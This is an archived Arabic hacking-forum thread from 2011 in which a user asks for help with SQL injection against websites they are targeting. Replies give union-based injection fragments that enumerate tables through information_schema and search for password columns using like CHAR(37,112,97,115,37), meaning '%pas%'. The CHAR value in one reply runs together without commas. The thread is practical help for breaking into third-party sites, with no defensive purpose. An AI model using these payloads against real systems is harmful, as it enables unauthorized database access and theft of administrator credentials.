:: vBspiders Professional Network ::

:: vBspiders Professional Network :: (http://www.vbspiders.com/vb/index.php)
-   جـــ'ابات العناكــ'ب (http://www.vbspiders.com/vb/f343.html)
-   -   ساعدوني في الحقن انا يائست يا شباب (http://www.vbspiders.com/vb/t57750.html)

مذكرة الموت 08-08-2011 08:58 PM
ساعدوني في الحقن انا يائست يا شباب
 
مرحبا شباب وربي اني يائست معا الحقن كثير من المواقع الي بحقنها

اول شي طبعا بحدد عدد الاعمده بعدين العمود المصاب بعدين اصدار القاعده
حلو لهنا الان اجي اطبق هاذا الامر في العمود المصاب Group_concat(table_name)
واطبق هاذا الامر خلف الاعمده From+information_schema.tables+where+table_schema= database()
واضغط انتر وتجيني جداول ما تدل عى جدول الادمن يعني ما الاقي جدول اسمه users او admin او login الاقي جداول اسمائها غريبه واجربها ما تضبط ويش الحل

المفترس 08-08-2011 09:51 PM
ضيف هده في الاخير

كود PHP:
+where+column_name+like+CHAR(371129711537

مذكرة الموت 08-09-2011 01:11 AM
شكرا اخي

يعني اضيف هذه الجمله +where+column_name+like+CHAR(37, 112, 97, 115, 37)

بعد From+information_schema.tables+where+table_schema= database

المفترس 08-09-2011 05:09 AM
حبيب شوف على حسب الموقع الدي تتعامل معه
ادا كانت حقنته double query
فهنا يلزمك اعادة شرح الاخ spartacos في دورة الحقن المتقدم
وهو يشرحها في الدرس 15
اما ادا كان sql injection
العادي
فقم بوضع الاستعلام هكدا
كود PHP:
+from information_schema.columns+where+column_name+like+CHAR(371129711537
ويارب اكن ساعدتك


الساعة الآن 10:45 PM


[ vBspiders.Com Network ]


SEO by vBSEO 3.6.0